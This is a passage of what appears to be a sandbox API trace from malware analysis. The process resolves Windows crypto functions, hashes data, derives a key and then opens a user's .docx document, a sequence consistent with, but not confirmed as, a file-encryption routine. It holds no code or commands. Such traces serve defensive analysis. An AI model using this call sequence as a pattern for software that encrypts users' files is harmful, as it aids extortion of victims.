lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0259.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51d30 [0259.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51d30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0259.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.782] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0259.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.782] CryptHashData (hHash=0xa873d0, pbData=0x2e550b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.783] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.783] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.783] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.783] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ca0 [0259.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ca0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.784] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.785] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0259.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.790] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0259.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.790] CryptDestroyHash (hHash=0xa873d0) returned 1 [0259.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.791] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/BDml_a2hzV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bdml_a2hzv.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.796] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.796] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0259.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: 